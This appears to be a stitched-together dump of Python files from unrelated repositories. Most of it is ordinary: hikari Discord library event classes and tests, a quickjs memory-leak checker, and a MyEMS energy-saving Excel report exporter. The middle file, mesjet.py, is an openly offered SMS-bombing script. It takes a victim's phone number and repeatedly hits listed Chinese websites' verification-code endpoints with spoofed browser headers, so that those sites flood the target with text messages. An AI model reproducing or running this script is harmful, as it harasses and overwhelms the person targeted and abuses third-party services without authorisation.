await self.failed_callback(self.failed_event)
```
#### File: hikari/events/scheduled_events.py
```python
from __future__ import annotations
__all__: typing.Sequence[str] = [
"ScheduledEventEvent",
"ScheduledEventCreateEvent",
"ScheduledEventDeleteEvent",
"ScheduledEventUpdateEvent",
"ScheduledEventUserAddEvent",
"ScheduledEventUserRemoveEvent",
]
import abc
import typing
import attr
from hikari import intents
from hikari.events import base_events
from hikari.events import shard_events
from hikari.internal import attr_extensions
if typing.TYPE_CHECKING:
from hikari import scheduled_events
from hikari import snowflakes
from hikari import traits
from hikari.api import shard as gateway_shard
@base_events.requires_intents(intents.Intents.GUILD_SCHEDULED_EVENTS)
class ScheduledEventEvent(shard_events.ShardEvent, abc.ABC):
"""Event bassed for any scheduled event related events."""
__slots__: typing.Sequence[str] = ()
@property
@abc.abstractmethod
def event_id(self) -> snowflakes.Snowflake:
"""ID of the scheduled event."""
@attr_extensions.with_copy
@attr.define(kw_only=True, weakref_slot=False)
@base_events.requires_intents(intents.Intents.GUILD_SCHEDULED_EVENTS)
class ScheduledEventCreateEvent(ScheduledEventEvent):
"""Event fired when a guild scheduled event is created."""
shard: gateway_shard.GatewayShard = attr.field(metadata={attr_extensions.SKIP_DEEP_COPY: True})
# <<inherited docstring from ShardEvent>>.
event: scheduled_events.ScheduledEvent = attr.field()
"""The scheduled event that was created."""
@property
def app(self) -> traits.RESTAware:
# <<inherited docstring from Event>>.
return self.event.app
@property
def event_id(self) -> snowflakes.Snowflake:
# <<inherited docstring from ScheduledEventEvent>>.
return self.event.id
@attr_extensions.with_copy
@attr.define(kw_only=True, weakref_slot=False)
@base_events.requires_intents(intents.Intents.GUILD_SCHEDULED_EVENTS)
class ScheduledEventDeleteEvent(ScheduledEventEvent):
"""Event fired when a guild scheduled event is deleted."""
shard: gateway_shard.GatewayShard = attr.field(metadata={attr_extensions.SKIP_DEEP_COPY: True})
# <<inherited docstring from ShardEvent>>.
event: scheduled_events.ScheduledEvent = attr.field()
"""The scheduled event that was deleted."""
@property
def app(self) -> traits.RESTAware:
# <<inherited docstring from Event>>.
return self.event.app
@property
def event_id(self) -> snowflakes.Snowflake:
# <<inherited docstring from ScheduledEventEvent>>.
return self.event.id
@attr_extensions.with_copy
@attr.define(kw_only=True, weakref_slot=False)
@base_events.requires_intents(intents.Intents.GUILD_SCHEDULED_EVENTS)
class ScheduledEventUpdateEvent(ScheduledEventEvent):
"""Event fired when a guild scheduled event is updated."""
shard: gateway_shard.GatewayShard = attr.field(metadata={attr_extensions.SKIP_DEEP_COPY: True})
# <<inherited docstring from ShardEvent>>.
event: scheduled_events.ScheduledEvent = attr.field()
"""The scheduled event that was updated."""
@property
def app(self) -> traits.RESTAware:
# <<inherited docstring from Event>>.
return self.event.app
@property
def event_id(self) -> snowflakes.Snowflake:
# <<inherited docstring from ScheduledEventEvent>>.
return self.event.id
@attr_extensions.with_copy
@attr.define(kw_only=True, weakref_slot=False)
@base_events.requires_intents(intents.Intents.GUILD_SCHEDULED_EVENTS)
class ScheduledEventUserAddEvent(ScheduledEventEvent):
"""Event fired when a user subscribes to a guild scheduled event."""
app: traits.RESTAware = attr.field(metadata={attr_extensions.SKIP_DEEP_COPY: True})
# <<inherited docstring from Event>>.
shard: gateway_shard.GatewayShard = attr.field(metadata={attr_extensions.SKIP_DEEP_COPY: True})
# <<inherited docstring from ShardEvent>>.
event_id: snowflakes.Snowflake = attr.field()
"""ID of the scheduled event that the user was added to."""
user_id: snowflakes.Snowflake = attr.field()
"""ID of the user that was added to the scheduled event."""
guild_id: snowflakes.Snowflake = attr.field()
"""ID of the guild that the scheduled event belongs to."""
@attr_extensions.with_copy
@attr.define(kw_only=True, weakref_slot=False)
@base_events.requires_intents(intents.Intents.GUILD_SCHEDULED_EVENTS)
class ScheduledEventUserRemoveEvent(ScheduledEventEvent):
"""Event fired when a user unsubscribes from a guild scheduled event."""
app: traits.RESTAware = attr.field(metadata={attr_extensions.SKIP_DEEP_COPY: True})
# <<inherited docstring from Event>>.
shard: gateway_shard.GatewayShard = attr.field(metadata={attr_extensions.SKIP_DEEP_COPY: True})
# <<inherited docstring from ShardEvent>>.
event_id: snowflakes.Snowflake = attr.field()
"""ID of the scheduled event that the user was removed from."""
user_id: snowflakes.Snowflake = attr.field()
"""ID of the user that was removed from the scheduled event."""
guild_id: snowflakes.Snowflake = attr.field()
"""ID of the guild that the scheduled event belongs to."""
```
#### File: hikari/internal/time.py
```python
from __future__ import annotations
__all__: typing.List[str] = [
"DISCORD_EPOCH",
"datetime_to_discord_epoch",
"discord_epoch_to_datetime",
"unix_epoch_to_datetime",
"Intervalish",
"timespan_to_int",
"local_datetime",
"utc_datetime",
"monotonic",
"monotonic_ns",
"uuid",
]
import datetime
import time
import typing
import uuid as uuid_
Intervalish = typing.Union[int, float, datetime.timedelta]
"""Type hint representing a naive time period or time span.
This is a type that is like an interval of some sort.
This is an alias for `typing.Union[int, float, datetime.datetime]`,
where `builtins.int` and `builtins.float` types are interpreted as a number of seconds.
"""
DISCORD_EPOCH: typing.Final[int] = 1_420_070_400
"""Discord epoch used within snowflake identifiers.
This is defined as the number of seconds between
`1/1/1970 00:00:00 UTC` and `1/1/2015 00:00:00 UTC`.
References
----------
* [Discord API documentation - Snowflakes](https://discord.com/developers/docs/reference#snowflakes)
"""
# Default to the standard lib parser, that isn't really ISO compliant but seems
# to work for what we need.
def slow_iso8601_datetime_string_to_datetime(datetime_str: str) -> datetime.datetime:
"""Parse an ISO-8601-like datestring into a datetime.
Parameters
----------
datetime_str : builtins.str
The date string to parse.
Returns
-------
datetime.datetime
The corresponding date time.
"""
if datetime_str.endswith(("z", "Z")):
# Python's parser cannot handle zulu time, it isn't a proper ISO-8601 compliant parser.
datetime_str = datetime_str[:-1] + "+00:00"
return datetime.datetime.fromisoformat(datetime_str)
fast_iso8601_datetime_string_to_datetime: typing.Optional[typing.Callable[[str], datetime.datetime]]
try:
# CISO8601 is around 600x faster than modules like dateutil, which is
# going to be noticeable on big bots where you are parsing hundreds of
# thousands of "joined_at" fields on users on startup.
import ciso8601
# Discord appears to actually use RFC-3339, which isn't a true ISO-8601 implementation,
# but somewhat of a subset with some edge cases.
# See https://tools.ietf.org/html/rfc3339#section-5.6
fast_iso8601_datetime_string_to_datetime = ciso8601.parse_rfc3339
except ImportError:
fast_iso8601_datetime_string_to_datetime = None
iso8601_datetime_string_to_datetime: typing.Callable[[str], datetime.datetime] = (
fast_iso8601_datetime_string_to_datetime or slow_iso8601_datetime_string_to_datetime
)
def discord_epoch_to_datetime(epoch: int, /) -> datetime.datetime:
"""Parse a Discord epoch into a `datetime.datetime` object.
Parameters
----------
epoch : builtins.int
Number of milliseconds since `1/1/2015 00:00:00 UTC`.
Returns
-------
datetime.datetime
Number of seconds since `1/1/1970 00:00:00 UTC`.
"""
return datetime.datetime.fromtimestamp(epoch / 1_000 + DISCORD_EPOCH, datetime.timezone.utc)
def datetime_to_discord_epoch(timestamp: datetime.datetime) -> int:
"""Parse a `datetime.datetime` object into an `builtins.int` `DISCORD_EPOCH` offset.
Parameters
----------
timestamp : datetime.datetime
Number of seconds since `1/1/1970 00:00:00 UTC`.
Returns
-------
builtins.int
Number of milliseconds since `1/1/2015 00:00:00 UTC`.
"""
return int((timestamp.timestamp() - DISCORD_EPOCH) * 1_000)
def unix_epoch_to_datetime(epoch: typing.Union[int, float], /, *, is_millis: bool = True) -> datetime.datetime:
"""Parse a UNIX epoch to a `datetime.datetime` object.
!!! note
If an epoch that's outside the range of what this system can handle,
this will return `datetime.datetime.max` if the timestamp is positive,
or `datetime.datetime.min` otherwise.
Parameters
----------
epoch : typing.Union[builtins.int, builtins.float]
Number of seconds/milliseconds since `1/1/1970 00:00:00 UTC`.
is_millis : builtins.bool
`builtins.True` by default, indicates the input timestamp is measured in
milliseconds rather than seconds
Returns
-------
datetime.datetime
Number of seconds since `1/1/1970 00:00:00 UTC`.
"""
# Datetime seems to raise an OSError when you try to convert an out of range timestamp on Windows and a ValueError
# if you try on a UNIX system so we want to catch both.
try:
epoch /= (is_millis * 1_000) or 1
return datetime.datetime.fromtimestamp(epoch, datetime.timezone.utc)
except (OSError, ValueError):
if epoch > 0:
return datetime.datetime.max
else:
return datetime.datetime.min
def timespan_to_int(value: Intervalish, /) -> int:
"""Cast the given timespan in seconds to an integer value.
Parameters
----------
value : Intervalish
The number of seconds.
Returns
-------
builtins.int
The integer number of seconds. Fractions are discarded. Negative values
are removed.
"""
if isinstance(value, datetime.timedelta):
value = value.total_seconds()
return int(max(0, value))
def local_datetime() -> datetime.datetime:
"""Return the current date/time for the system's time zone."""
return utc_datetime().astimezone()
def utc_datetime() -> datetime.datetime:
"""Return the current date/time for UTC (GMT+0)."""
return datetime.datetime.now(tz=datetime.timezone.utc)
# time.monotonic_ns is no slower than time.monotonic, but is more accurate.
# Also, fun fact that monotonic_ns appears to be 1µs faster on average than
# monotonic on ARM64 architectures, but on x86, monotonic is around 1ns faster
# than monotonic_ns. Just thought that was kind of interesting to note down.
# (RPi 3B versus i7 6700)
# time.perf_counter and time.perf_counter_ns don't have proper typehints, causing
# pdoc to not be able to recognise them. This is just a little hack around that.
def monotonic() -> float:
"""Performance counter for benchmarking.""" # noqa: D401 - Imperative mood
return time.perf_counter()
def monotonic_ns() -> int:
"""Performance counter for benchmarking as nanoseconds.""" # noqa: D401 - Imperative mood
return time.perf_counter_ns()
def uuid() -> str:
"""Generate a unique UUID (1ns precision)."""
return uuid_.uuid1(None, monotonic_ns()).hex
```
#### File: hikaki/hikari/scheduled_events.py
```python
from __future__ import annotations
__all__: typing.Sequence[str] = [
"EventPrivacyLevel",
"ScheduledEventType",
"ScheduledEventStatus",
"ScheduledEvent",
"ScheduledExternalEvent",
"ScheduledStageEvent",
"ScheduledVoiceEvent",
"ScheduledEventUser",
]
import typing
import attr
from hikari import snowflakes
from hikari import urls
from hikari.internal import attr_extensions
from hikari.internal import enums
from hikari.internal import routes
if typing.TYPE_CHECKING:
import datetime
from hikari import files
from hikari import guilds
from hikari import traits
from hikari import users
class EventPrivacyLevel(int, enums.Enum):
"""Enum of the possible scheduled event privacy levels."""
GUILD_ONLY = 2
"""The scheduled event is only available to guild members."""
class ScheduledEventType(int, enums.Enum):
"""Enum of the scheduled event types."""
STAGE_INSTANCE = 1
"""A scheduled stage instance."""
VOICE = 2
"""A scheculed voice chat event."""
EXTERNAL = 3
"""A scheduled event which takes part outside of Discord."""
class ScheduledEventStatus(int, enums.Enum):
"""Enum of the scheduled event statuses."""
SCHEDULED = 1
"""Indicates that the scheduled event hasn't occurred yet."""
ACTIVE = 2
"""Indicates an eventis on-going."""
COMPLETED = 3
"""Indicates an event has finished."""
CANCELED = 4
"""Indicates an event has been canceled."""
CANCELLED = CANCELED
"""Alias of `ScheduledEventStatus.CANCELED`."""
@attr_extensions.with_copy
@attr.define(hash=True, kw_only=True, weakref_slot=False)
class ScheduledEvent(snowflakes.Unique):
"""Base class for scheduled events."""
# entity_id is ignored right now due to always being null
# creator_id is ignored as it just dupes creator.id
app: traits.RESTAware = attr.field(
repr=False, eq=False, hash=False, metadata={attr_extensions.SKIP_DEEP_COPY: True}
)
"""The client application that models may use for procedures."""
id: snowflakes.Snowflake = attr.field(hash=True, repr=True)
"""ID of the scheduled event."""
guild_id: snowflakes.Snowflake = attr.field(hash=False, repr=True)
"""ID of the guild this scheduled event belongs to."""
name: str = attr.field(hash=False, repr=True)
"""Name of the scheduled event."""
description: typing.Optional[str] = attr.field(hash=False, repr=False)
"""Description of the scheduled event."""
start_time: datetime.datetime = attr.field(hash=False, repr=False)
"""When the event is scheduled to start."""
end_time: typing.Optional[datetime.datetime] = attr.field(hash=False, repr=False)
"""When the event is scheduled to end, if set."""
privacy_level: EventPrivacyLevel = attr.field(hash=False, repr=False)
"""Privacy level of the scheduled event.
This restricts who can view and join the scheduled event.
"""
status: ScheduledEventStatus = attr.field(hash=False, repr=True)
"""Status of the scheduled event."""
entity_type: ScheduledEventType = attr.field(hash=False, repr=True)
"""The type of entity this scheduled event is associated with."""
creator: typing.Optional[users.User] = attr.field(hash=False, repr=False)
"""The user who created the scheduled event.
This will only be set for event created after 2021-10-25.
"""
user_count: typing.Optional[int] = attr.field(hash=False, repr=False)
"""The number of users that have subscribed to the event.
This will be `builtins.None` on gateway events when creating and
editing a scheduled event.
"""
image_hash: typing.Optional[str] = attr.field(hash=False, repr=False)
"""Hash of the image used for the scheduled event, if set."""
@property
def image_url(self) -> typing.Optional[files.URL]:
"""Cover image for this scheduled event, if set."""
return self.make_image_url()
def make_image_url(self, *, ext: str = "png", size: int = 4096) -> typing.Optional[files.URL]:
"""Generate the cover image for this scheduled event, if set.
Parameters
----------
ext : builtins.str
The extension to use for this URL, defaults to `png`.
Supports `png`, `jpeg`, `jpg` and `webp`.
size : builtins.int
The size to set for the URL, defaults to `4096`.
Can be any power of two between 16 and 4096.
Returns
-------
typing.Optional[hikari.files.URL]
The URL, or `builtins.None` if no cover image is set.
Raises
------
builtins.ValueError
If `size` is not a power of two between 16 and 4096 (inclusive).
"""
if self.image_hash is None:
return None
return routes.SCHEDULED_EVENT_COVER.compile_to_file(
urls.CDN_URL,
scheduled_event_id=self.id,
hash=self.image_hash,
size=size,
file_format=ext,
)
@attr_extensions.with_copy
@attr.define(hash=True, kw_only=True, weakref_slot=False)
class ScheduledExternalEvent(ScheduledEvent):
"""A scheduled event that takes place outside of Discord."""
location: str = attr.field(hash=False, repr=False)
"""The location of the scheduled event.
!!! note
There is no strict format for this field, and it will likely be a user
friendly string.
"""
end_time: datetime.datetime = attr.field(hash=False, repr=False)
"""When the event is scheduled to end."""
@attr_extensions.with_copy
@attr.define(hash=True, kw_only=True, weakref_slot=False)
class ScheduledStageEvent(ScheduledEvent):
"""A scheduled event that takes place in a stage channel."""
channel_id: snowflakes.Snowflake = attr.field(hash=False, repr=False)
"""ID of the stage channel this event is scheduled in."""
@attr_extensions.with_copy
@attr.define(hash=True, kw_only=True, weakref_slot=False)
class ScheduledVoiceEvent(ScheduledEvent):
"""A scheduled event that takes place in a voice channel."""
channel_id: snowflakes.Snowflake = attr.field(hash=False, repr=False)
"""ID of the voice channel this scheduled event is in."""
@attr_extensions.with_copy
@attr.define(kw_only=True, weakref_slot=False)
class ScheduledEventUser:
"""A user who is subscribed to a scheduled event."""
event_id: snowflakes.Snowflake = attr.field(hash=False, repr=True)
"""ID of the scheduled event they're subscribed to."""
user: users.User = attr.field(hash=True, repr=True)
"""Object representing the user."""
member: typing.Optional[guilds.Member] = attr.field(hash=False, repr=False)
"""Their guild member object if they're in the event's guild."""
```
#### File: tests/hikari/test_presences.py
```python
import mock
import pytest
from hikari import files
from hikari import presences
from hikari import snowflakes
from hikari import urls
from hikari.impl import bot
from hikari.internal import routes
@pytest.fixture()
def mock_app():
return mock.Mock(spec_set=bot.GatewayBot)
class TestActivityAssets:
def test_large_image_url_property(self):
asset = presences.ActivityAssets(
application_id=None,
large_image=None,
large_text=None,
small_image=None,
small_text=None,
)
with mock.patch.object(presences.ActivityAssets, "make_large_image_url") as make_large_image_url:
result = asset.large_image_url
assert result is make_large_image_url.return_value
make_large_image_url.assert_called_once_with()
def test_large_image_url_property_when_runtime_error(self):
asset = presences.ActivityAssets(
application_id=None,
large_image=None,
large_text=None,
small_image=None,
small_text=None,
)
with mock.patch.object(
presences.ActivityAssets, "make_large_image_url", side_effect=RuntimeError
) as make_large_image_url:
result = asset.large_image_url
assert result is None
make_large_image_url.assert_called_once_with()
def test_make_large_image_url(self):
asset = presences.ActivityAssets(
application_id=45123123,
large_image="541sdfasdasd",
large_text=None,
small_image=None,
small_text=None,
)
with mock.patch.object(routes, "CDN_APPLICATION_ASSET") as route:
assert asset.make_large_image_url(ext="fa", size=3121) is route.compile_to_file.return_value
route.compile_to_file.assert_called_once_with(
urls.CDN_URL,
application_id=45123123,
hash="541sdfasdasd",
size=3121,
file_format="fa",
)
def test_make_large_image_url_when_no_hash(self):
asset = presences.ActivityAssets(
application_id=None,
large_image=None,
large_text=None,
small_image=None,
small_text=None,
)
assert asset.make_large_image_url() is None
@pytest.mark.parametrize(
("asset_hash", "expected"), [("mp:541sdfasdasd", "https://media.discordapp.net/541sdfasdasd")]
)
def test_make_large_image_url_when_dynamic_url(self, asset_hash: str, expected: str):
asset = presences.ActivityAssets(
application_id=None,
large_image=asset_hash,
large_text=None,
small_image=None,
small_text=None,
)
assert asset.make_large_image_url() == files.URL(expected)
def test_make_large_image_url_when_unknown_dynamic_url(self):
asset = presences.ActivityAssets(
application_id=None,
large_image="uwu:nou",
large_text=None,
small_image=None,
small_text=None,
)
with pytest.raises(RuntimeError, match="Unknown asset type"):
asset.make_large_image_url()
def test_small_image_url_property(self):
asset = presences.ActivityAssets(
application_id=None,
large_image=None,
large_text=None,
small_image=None,
small_text=None,
)
with mock.patch.object(presences.ActivityAssets, "make_small_image_url") as make_small_image_url:
result = asset.small_image_url
assert result is make_small_image_url.return_value
make_small_image_url.assert_called_once_with()
def test_small_image_url_property_when_runtime_error(self):
asset = presences.ActivityAssets(
application_id=None,
large_image=None,
large_text=None,
small_image=None,
small_text=None,
)
with mock.patch.object(
presences.ActivityAssets, "make_small_image_url", side_effect=RuntimeError
) as make_small_image_url:
result = asset.small_image_url
assert result is None
make_small_image_url.assert_called_once_with()
def test_make_small_image_url(self):
asset = presences.ActivityAssets(
application_id=123321,
large_image=None,
large_text=None,
small_image="aseqwsdas",
small_text=None,
)
with mock.patch.object(routes, "CDN_APPLICATION_ASSET") as route:
assert asset.make_small_image_url(ext="eat", size=123312) is route.compile_to_file.return_value
route.compile_to_file.assert_called_once_with(
urls.CDN_URL,
application_id=123321,
hash="aseqwsdas",
size=123312,
file_format="eat",
)
def test_make_small_image_url_when_no_hash(self):
asset = presences.ActivityAssets(
application_id=None,
large_image=None,
large_text=None,
small_image=None,
small_text=None,
)
assert asset.make_small_image_url() is None
@pytest.mark.parametrize(("asset_hash", "expected"), [("mp:4123fdssdf", "https://media.discordapp.net/4123fdssdf")])
def test_make_small_image_url_when_dynamic_url(self, asset_hash: str, expected: str):
asset = presences.ActivityAssets(
application_id=None,
large_image=None,
large_text=None,
small_image=asset_hash,
small_text=None,
)
assert asset.make_small_image_url() == files.URL(expected)
def test_make_small_image_url_when_unknown_dynamic_url(self):
asset = presences.ActivityAssets(
application_id=None,
large_image=None,
large_text=None,
small_image="meow:nyaa",
small_text=None,
)
with pytest.raises(RuntimeError, match="Unknown asset type"):
asset.make_small_image_url()
class TestActivity:
def test_str_operator(self):
activity = presences.Activity(name="something", type=presences.ActivityType(1))
assert str(activity) == "something"
class TestMemberPresence:
@pytest.fixture()
def model(self, mock_app):
return presences.MemberPresence(
app=mock_app,
user_id=snowflakes.Snowflake(432),
guild_id=snowflakes.Snowflake(234),
visible_status=presences.Status.ONLINE,
activities=mock.Mock(presences.RichActivity),
client_status=mock.Mock(presences.ClientStatus),
)
@pytest.mark.asyncio()
async def test_fetch_user(self, model):
model.app.rest.fetch_user = mock.AsyncMock()
assert await model.fetch_user() is model.app.rest.fetch_user.return_value
model.app.rest.fetch_user.assert_awaited_once_with(432)
@pytest.mark.asyncio()
async def test_fetch_member(self, model):
model.app.rest.fetch_member = mock.AsyncMock()
assert await model.fetch_member() is model.app.rest.fetch_member.return_value
model.app.rest.fetch_member.assert_awaited_once_with(234, 432)
``` |
{
"source": "81Vm3/mesjet",
"score": 2
} |
#### File: 81Vm3/mesjet/mesjet.py
```python
import sys, requests, time
fake_headers = {
"User-Agent" : "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36"
}
def getTickCount():
return int(round(time.time() * 1000))
def keyboardInterruptExit():
print("\nThe mission has been canceled.")
exit()
class CExploit():
def __init__(self, name, url, delay, post_or_get, data):
self.name = str(name)
self.url = str(url)
self.delay = int(delay)
self.post_or_get = bool(post_or_get) #post is true whereas get is false
self.data = data #can be json or parameters
self.last_send = 0
def setMobile(self, pmobile):
if self.post_or_get:
for i in self.data:
if type(self.data[i]) == str: #is string
if self.data[i] == "__MOBILE":
self.data[i] = str(pmobile)
else:
if type(self.data) == str:
self.data = self.data.replace("__MOBILE", str(pmobile)) #it"s for get
def perform(self):
try:
if self.post_or_get:
r = requests.post(self.url, data=self.data, headers=fake_headers)
print(r.text)
#print(r.status_code)
else:
#print(self.url + self.data)
r = requests.get(self.url + self.data, headers=fake_headers)
print(r.text)
#print(r.status_code)
except KeyboardInterrupt:
keyboardInterruptExit()
except:
print("Failed to call \"%s\"" % (self.name))
exploits = [
#------USEFUL------
CExploit("OCQ云智能管理", "http://app.imocq.com/login/registerInMobilePhone", 60, True, {"emailMobilePhone":"__MOBILE"}),
CExploit("四川省特种设备考试机构报名系统", "http://t.scasei.org.cn/ajax/send-mobile-code", 30, True, {"mobile":"__MOBILE", "usage":"register"}),
#------USEFUL------
#CExploit("大V店", "http://s.davdian.com/index.php?c=sms&a=send", 60, True, {"mobile":"__MOBILE"}),
#CExploit("Dfv", "http://www.defuv.com/index.php/Ajax/send_msg", 60, False, "?mobile=__MOBILE"),
#CExploit("迪卡侬", "https://www.decathlon.com.cn/zh/ajax/rest/model/atg/userprofiling/ProfileActor/send-mobile-verification-code", 30, True, {"countryCode":"CN","mobile":"__MOBILE"}),
#CExploit("潇x书院", "https://www.xxsy.net/Reg/Actions", 120, True, {"method":"sms", "mobile":"__MOBILE", "uname":"__MOBILE", "imgcode":"", "token":"<KEY>"}),
#########由于某种未知原因无法使用
#CExploit("私募排排网", "https://fof.simuwang.com/index.php?c=Login&a=getRegisterPhoneCode", 60, False, "&phone=__MOBILE"),
#CExploit("超级简历", "https://www.wondercv.com/verify_tokens/phone", 60, True, {"phone_number":"__MOBILE"}),
#CExploit("和讯", "https://reg.hexun.com/ajax/login_ajax.aspx", 60, True, {"mobile":"__MOBILE", "verifycode":"", "act": "sendsms_login"}),
#CExploit("华图在线", "http://api.huatu.com/lumenapi/v4/common/message/send_by_java", 60, False, "?mobile=__MOBILE"),
#CExploit("快速注册通道", "http://j.seo691.com/register/getverify.html", 90, False, "?reg_mobile=__MOBILE"),
#########
]
if len(sys.argv) < 2:
print("""usage: [phone-number] [delay]
phone-number --- The target you want to attack.
delay --- Millisecond, to slow the script down instead of done all performance at time.""")
print("The script currently has a total of %d exploits. (You can open & edit the script for adding more)" % (len(exploits)))
exit()
target = sys.argv[1]
delay = sys.argv[2]
for i in range(len(exploits)):
exploits[i].setMobile(int(target))
last_send = 0
try:
while(True):
for i in range(len(exploits)):
if (getTickCount() - last_send) > 1000:
if (getTickCount() - exploits[i].last_send) > exploits[i].delay:
exploits[i].perform()
last_send = exploits[i].ticks = getTickCount()
except KeyboardInterrupt:
keyboardInterruptExit()
``` |
{
"source": "821938089/quickjs",
"score": 2
} |
#### File: 821938089/quickjs/check_memory.py
```python
import gc
import tracemalloc
import unittest
import quickjs
import test_quickjs
def run():
loader = unittest.TestLoader()
suite = loader.discover(".")
runner = unittest.TextTestRunner()
runner.run(suite)
filters = [
tracemalloc.Filter(True, quickjs.__file__),
tracemalloc.Filter(True, test_quickjs.__file__),
]
def main():
print("Warming up (to discount regex cache etc.)")
run()
tracemalloc.start(25)
gc.collect()
snapshot1 = tracemalloc.take_snapshot().filter_traces(filters)
run()
gc.collect()
snapshot2 = tracemalloc.take_snapshot().filter_traces(filters)
top_stats = snapshot2.compare_to(snapshot1, 'traceback')
print("Objects not released")
print("====================")
for stat in top_stats:
if stat.size_diff == 0:
continue
print(stat)
for line in stat.traceback.format():
print(" ", line)
print("\nquickjs should not show up above.")
if __name__ == "__main__":
main()
``` |
{
"source": "823914102/myems-api",
"score": 2
} |
#### File: myems-api/excelexporters/spacesaving.py
```python
import base64
import uuid
import os
from openpyxl.chart import (
PieChart,
BarChart,
Reference,
)
from openpyxl.styles import PatternFill, Border, Side, Alignment, Font
from openpyxl.drawing.image import Image
from openpyxl import Workbook
from openpyxl.chart.label import DataLabelList
####################################################################################################################
# PROCEDURES
# Step 1: Validate the report data
# Step 2: Generate excel file
# Step 3: Encode the excel file bytes to Base64
####################################################################################################################
def export(report,
name,
reporting_start_datetime_local,
reporting_end_datetime_local,
period_type):
####################################################################################################################
# Step 1: Validate the report data
####################################################################################################################
if report is None:
return None
print(report)
####################################################################################################################
# Step 2: Generate excel file from the report data
####################################################################################################################
filename = generate_excel(report,
name,
reporting_start_datetime_local,
reporting_end_datetime_local,
period_type)
####################################################################################################################
# Step 3: Encode the excel file to Base64
####################################################################################################################
try:
with open(filename, 'rb') as binary_file:
binary_file_data = binary_file.read()
except IOError as ex:
pass
# Base64 encode the bytes
base64_encoded_data = base64.b64encode(binary_file_data)
# get the Base64 encoded data using human-readable characters.
base64_message = base64_encoded_data.decode('utf-8')
# delete the file from server
try:
os.remove(filename)
except NotImplementedError as ex:
pass
return base64_message
def generate_excel(report,
name,
reporting_start_datetime_local,
reporting_end_datetime_local,
period_type):
wb = Workbook()
ws = wb.active
# Row height
ws.row_dimensions[1].height = 118
for i in range(2, 2000 + 1):
ws.row_dimensions[i].height = 30
# Col width
ws.column_dimensions['A'].width = 1.5
ws.column_dimensions['B'].width = 25.0
for i in range(ord('C'), ord('I')):
ws.column_dimensions[chr(i)].width = 25.0
# Font
name_font = Font(name='Constantia', size=15, bold=True)
name_small_font = Font(name='Constantia', size=10, bold=True)
title_font = Font(name='宋体', size=15, bold=True)
title_small_font = Font(name='宋体', size=10, bold=True)
data_font = Font(name='Franklin Gothic Book', size=11)
table_fill = PatternFill(fill_type='solid', fgColor='1F497D')
f_border = Border(left=Side(border_style='medium', color='00000000'),
right=Side(border_style='medium', color='00000000'),
bottom=Side(border_style='medium', color='00000000'),
top=Side(border_style='medium', color='00000000')
)
b_border = Border(
bottom=Side(border_style='medium', color='00000000'),
)
b_c_alignment = Alignment(vertical='bottom',
horizontal='center',
text_rotation=0,
wrap_text=False,
shrink_to_fit=False,
indent=0)
c_c_alignment = Alignment(vertical='center',
horizontal='center',
text_rotation=0,
wrap_text=False,
shrink_to_fit=False,
indent=0)
b_r_alignment = Alignment(vertical='bottom',
horizontal='right',
text_rotation=0,
wrap_text=False,
shrink_to_fit=False,
indent=0)
c_r_alignment = Alignment(vertical='bottom',
horizontal='center',
text_rotation=0,
wrap_text=False,
shrink_to_fit=False,
indent=0)
# Img
img = Image("excelexporters/myems.png")
# img = Image("myems.png")
ws.add_image(img, 'B1')
# Title
ws['B3'].font = name_font
ws['B3'].alignment = b_r_alignment
ws['B3'] = 'Name:'
ws['C3'].border = b_border
ws['C3'].alignment = b_c_alignment
ws['C3'].font = name_font
ws['C3'] = name
ws['D3'].font = name_font
ws['D3'].alignment = b_r_alignment
ws['D3'] = 'Period:'
ws['E3'].border = b_border
ws['E3'].alignment = b_c_alignment
ws['E3'].font = name_font
ws['E3'] = period_type
ws['F3'].font = name_font
ws['F3'].alignment = b_r_alignment
ws['F3'] = 'Date:'
ws.merge_cells("G3:J3")
for i in range(ord('G'), ord('K')):
ws[chr(i) + '3'].border = b_border
ws['G3'].alignment = b_c_alignment
ws['G3'].font = name_font
ws['G3'] = reporting_start_datetime_local + "__" + reporting_end_datetime_local
if "reporting_period" not in report.keys() or \
"names" not in report['reporting_period'].keys() or len(report['reporting_period']['names']) == 0:
filename = str(uuid.uuid4()) + '.xlsx'
wb.save(filename)
return filename
##################################
current_row_number = 6
reporting_period_data = report['reporting_period']
has_names_data_flag = True
if "names" not in reporting_period_data.keys() or \
reporting_period_data['names'] is None or \
len(reporting_period_data['names']) == 0:
has_names_data_flag = False
if has_names_data_flag:
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)] = name + ' 报告期节约'
current_row_number += 1
category = reporting_period_data['names']
ca_len = len(category)
ws['B' + str(current_row_number)].fill = table_fill
col = 'C'
for i in range(0, ca_len):
ws[col + str(current_row_number)].fill = table_fill
ws[col + str(current_row_number)].font = name_small_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = \
reporting_period_data['names'][i] + " (基线-实际) (" + reporting_period_data['units'][i] + ")"
col = chr(ord(col) + 1)
ws[col + str(current_row_number)].fill = table_fill
ws[col + str(current_row_number)].font = name_small_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = '吨标准煤 (基线-实际) (TCE)'
col = chr(ord(col) + 1)
ws[col + str(current_row_number)].fill = table_fill
ws[col + str(current_row_number)].font = name_small_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = '吨二氧化碳排放 (基线-实际) (TCO2E)'
col = chr(ord(col) + 1)
current_row_number += 1
ws['B' + str(current_row_number)].font = title_font
ws['B' + str(current_row_number)].alignment = c_c_alignment
ws['B' + str(current_row_number)].border = f_border
ws['B' + str(current_row_number)] = '节约'
col = 'C'
for i in range(0, ca_len):
ws[col + str(current_row_number)].font = name_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = round(reporting_period_data['subtotals_saving'][i], 2)
col = chr(ord(col) + 1)
ws[col + str(current_row_number)].font = name_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = round(reporting_period_data['total_in_kgce_saving'], 2)
col = chr(ord(col) + 1)
ws[col + str(current_row_number)].font = name_font
ws[col + str(current_row_number)].alignment = c_c_alignment
ws[col + str(current_row_number)].border = f_border
ws[col + str(current_row_number)] = round(reporting_period_data['total_in_kgco2e_saving'], 2)
col = chr(ord(col) + 1)
